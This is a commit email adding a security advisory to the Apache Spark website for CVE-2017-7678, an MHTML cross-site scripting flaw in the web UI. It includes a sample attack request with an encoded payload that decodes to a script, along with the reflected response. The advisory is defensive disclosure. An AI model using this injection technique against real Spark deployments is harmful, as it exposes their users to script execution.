You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@spark.apache.org by sr...@apache.org on 2017/07/12 10:24:58 UTC
spark-website git commit: Add note about CVE-2017-7678
Repository: spark-website
Updated Branches:
refs/heads/asf-site f2d5d2a68 -> 1c7fd01e9
Add note about CVE-2017-7678
Project: http://git-wip-us.apache.org/repos/asf/spark-website/repo
Commit: http://git-wip-us.apache.org/repos/asf/spark-website/commit/1c7fd01e
Tree: http://git-wip-us.apache.org/repos/asf/spark-website/tree/1c7fd01e
Diff: http://git-wip-us.apache.org/repos/asf/spark-website/diff/1c7fd01e
Branch: refs/heads/asf-site
Commit: 1c7fd01e9eb258407da07dc765444e4cf8c28f7c
Parents: f2d5d2a
Author: Sean Owen <so...@cloudera.com>
Authored: Wed Jul 12 11:24:41 2017 +0100
Committer: Sean Owen <so...@cloudera.com>
Committed: Wed Jul 12 11:24:41 2017 +0100
----------------------------------------------------------------------
security.md | 43 ++++++++++++++++++++++++++++++++++++++++++-
site/security.html | 42 +++++++++++++++++++++++++++++++++++++++++-
2 files changed, 83 insertions(+), 2 deletions(-)
----------------------------------------------------------------------
http://git-wip-us.apache.org/repos/asf/spark-website/blob/1c7fd01e/security.md
----------------------------------------------------------------------
diff --git a/security.md b/security.md
index 505c225..a26f1d1 100644
--- a/security.md
+++ b/security.md
@@ -17,4 +17,45 @@ non-public list that will reach the Spark PMC. Messages to `security@apache.org`
<h2>Known Security Issues</h2>
-None yet.
\ No newline at end of file
+<h3 id="CVE-2017-7678">CVE-2017-7678 Apache Spark XSS web UI MHTML vulnerability</h3>
+
+Severity: Low
+
+Vendor: The Apache Software Foundation
+
+Versions Affected:
+Versions of Apache Spark before 2.2.0
+
+Description:
+It is possible for an attacker to take advantage of a user's trust in the server to trick them into visiting a link that points to a shared Spark cluster and submits data including MHTML to the Spark master, or history server. This data, which could contain a script, would then be reflected back to the user and could be evaluated and executed by MS Windows-based clients. It is not an attack on Spark itself, but on the user, who may then execute the script inadvertently when viewing elements of the Spark web UIs.
+
+Mitigation:
+Update to Apache Spark 2.2.0 or later.
+
+Example:
+Request:
+```
+GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
+_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
+Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
+HTTP/1.1
+```
+
+Excerpt from response:
+```
+<div class="row-fluid">No running application with ID Content-Type: multipart/related;
+boundary=_AppScan
+--_AppScan
+Content-Location:foo
+Content-Transfer-Encoding:base64
+PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
+</div>
+```
+Result: In the above payload the BASE64 data decodes as:
+```
+<html><script>alert("XSS")</script></html>
+```
+
+Credit:
+- Mike Kasper, Nicholas Marion
+- IBM z Systems Center for Secure Engineering
\ No newline at end of file
http://git-wip-us.apache.org/repos/asf/spark-website/blob/1c7fd01e/site/security.html
----------------------------------------------------------------------
diff --git a/site/security.html b/site/security.html
index 83345d3..3ef0942 100644
--- a/site/security.html
+++ b/site/security.html
@@ -204,7 +204,47 @@ non-public list that will reach the Spark PMC. Messages to <code>security@apache
<h2>Known Security Issues</h2>
-<p>None yet.</p>
+<h3 id="CVE-2017-7678">CVE-2017-7678 Apache Spark XSS web UI MHTML vulnerability</h3>
+
+<p>Severity: Low</p>
+
+<p>Vendor: The Apache Software Foundation</p>
+
+<p>Versions Affected:
+Versions of Apache Spark before 2.2.0</p>
+
+<p>Description:
+It is possible for an attacker to take advantage of a user’s trust in the server to trick them into visiting a link that points to a shared Spark cluster and submits data including MHTML to the Spark master, or history server. This data, which could contain a script, would then be reflected back to the user and could be evaluated and executed by MS Windows-based clients. It is not an attack on Spark itself, but on the user, who may then execute the script inadvertently when viewing elements of the Spark web UIs.</p>
+
+<p>Mitigation:
+Update to Apache Spark 2.2.0 or later.</p>
+
+<p>Example:
+Request:</p>
+<pre><code>GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
+_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
+Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
+HTTP/1.1
+</code></pre>
+
+<p>Excerpt from response:</p>
+<pre><code><div class="row-fluid">No running application with ID Content-Type: multipart/related;
+boundary=_AppScan
+--_AppScan
+Content-Location:foo
+Content-Transfer-Encoding:base64
+PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
+</div>
+</code></pre>
+<p>Result: In the above payload the BASE64 data decodes as:</p>
+<pre><code><html><script>alert("XSS")</script></html>
+</code></pre>
+
+<p>Credit:</p>
+<ul>
+ <li>Mike Kasper, Nicholas Marion</li>
+ <li>IBM z Systems Center for Secure Engineering</li>
+</ul>
</div>
</div>
---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@spark.apache.org
For additional commands, e-mail: commits-help@spark.apache.org